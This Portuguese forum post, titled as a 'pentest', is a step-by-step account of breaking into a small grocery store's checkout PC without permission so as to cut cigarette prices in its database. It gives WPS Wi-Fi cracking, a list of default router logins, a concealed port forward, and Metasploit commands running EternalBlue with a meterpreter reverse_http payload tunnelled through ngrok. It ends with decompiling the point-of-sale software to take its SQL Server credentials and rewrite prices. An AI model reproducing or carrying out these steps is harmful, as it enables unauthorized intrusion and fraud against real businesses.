Jump to content
Sign in to follow this  
gusdnide

Pentest no mercadinho [COMPLETO]

Recommended Posts

Olá venho mostrar como  fiz para entrar no computador do mercadinho remotamente, foi o primeiro passo antes deu alterar o preço do cigarro para  4 reais (antes era  R$ 8,50 ja faz 5 dias e nada foi alterado ),

Passos:

  1. Entrar na rede
  2. Mapear a rede & encontrar o caixa
  3. Encontrar vulnerabilidades
  4. Redirecionar portas do caixa para WAN
  5. Invaindo o caixa

Passo 1

Como voce não vai poder simplesmente se conectar a LAN , o padrão é tentar fazer uma conexão por Wi-fi, no meu caso a rede tinha WPS ligado, então usando o WPS App para encontrar o pin da rede para que eu possa conectar, voce pode usar varias ferramentas para tentar fazer ter conexao num wifi, 

Screenshot Image

Passo 2

Utilizei um app chamado Network Scanner para fazer uma varredura na rede, com isso você pode pegar cada dispositivo conectado a rede, procure por computadores na rede, no meu caso só existe 1 caixa no mercadinho e com isso foi facil descobrir qual dos hosts era e lembre-se reconhecer o sistema que está rodando, se for Windows você tem mais chances de conceguir, aproveite e pegue também o endereço do Gateway no caso: 192.168.1.1

//Simulaçao

adads.jpg

 

 

 

Passo 3

Ainda no Network Scanner, verifique as portas do computador , verifique se existe alguma porta vulneravel, no meu caso a 445 pode ser vulneravel ao terrivel EternalBlue e como o mercado não é muito grande provavelmente não fazem atualizaçao o sistema no sistema, oque pode ser um error fatal não deixar seu sistema atualizado,

2b499a7d-57bd-43a0-a215-b75322391b07.jpg

 

Passo 4

Entre no navegador e entre no gateway (Geralmente 192.168.1.1 ou 192.168.0.1),  provavelmente irá pedir login ou senha, você pode tentar usar o routersploit no android para poder encontrar o login e senha do roteador, mas você pode fazer testes rapidos em logins padroes (Lista abaixo) , assim que conceguiu acesso ao roteador você precisa liberar portas para o ip do caixa (lembre de redirecionar para o IP do caixa) geralmente uma pagina chamada Port Forwarding, achou? entao adicionar uma nova regra e Porta Publica (Public Port) use portas entre 1001-9999 pois a maioria dos scanners de portas scaneia de 1-1000 e em Porta Privada (Private Port) voce irá colocar a porta que se encontra uma possivel vulnerabilidade no meu caso 445 e no protocolo (protocol) voce coloca TCP , e aumentar a chance  nenhuma outra pessoa achar esse caminho, caso tenho dificuldades para liberar portas no roteador aproveite a internet gratis e pesquisa como abrir portas usando o modelo do roteador (que pode ser facilmente encontrado fusando no painel) 

Logins padrao:

  • admin admin
  • admin (SENHA EM BRANCO)
  • admin gvt12345
  • guest guest

Captura-de-Tela-20190510105116.png

Passo 5 

Antes de ir embora para casa aproveite e pegue o IP WAN da rede, facilmente encontrado no site: MyIP org ou MeuIP br, em casa já com o café do lado, abra um bloco de notas e grave suas informaçoes nela ex:  164.216.21.3:4444 -> 192.168.1.21:445, bom vamos ver se realmente é  vulneravel ao ataque  do eternalblue , abra o metasploit e use smb_ms17_010  para checar se é vulneravel, exemplo do meu caso: RHOSTS: 164.216.21.3 RPORT: 4444 comandos abaixo.

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 164.216.21.3 
set RPORT 4444
exploit

caso o retorno ter Host is likely VULNERABLE to MS17-010! é vulneravel como no meu caso abaixo:

[+] 164.216.21.3:4444       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 164.216.21.3:4444       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Boa agora vamos explorar essa vulnerabilidade use o exploit windows/smb/ms17_010_eternalblue para invadir, no meu exemplo irei usar o ngrok para fazer tunnel com o meu localhost (APRENDA USAR O NGROK AQUI ) utilizarei o payload windows/meterpreter/reverse_http 

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 164.216.21.3
set RPORT 4444
set LHOST 0.tcp.ngrok.com
set LPORT 46707 
exploit

Pronto, agora estude o computador, meus passos para alterar o banco de  dados:

Naveguei até a area de trabalho, verifiquei todos os links, e vi que tinha um chamado Sis comerce, baixei o executavel dele, decompilei ele com o .NET Reflector, verifiquei que ele faz conexão com o banco de dados da Microsoft SQL Server, usando o mono desenvolvi uma ferramenta para conectar no banco usando os dados que decompilei (Existe uma classe conectora do DB contendo host, user...) só apliquei a mesma coisa no mono, simplesmente atualizei o preço de todos os produtos com o nome "CIGARRO DE PALHA MINAS" para 4.00.

Videos que podem ajudar:

 

 

 

Edited by gusdnide
  • Like 2

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.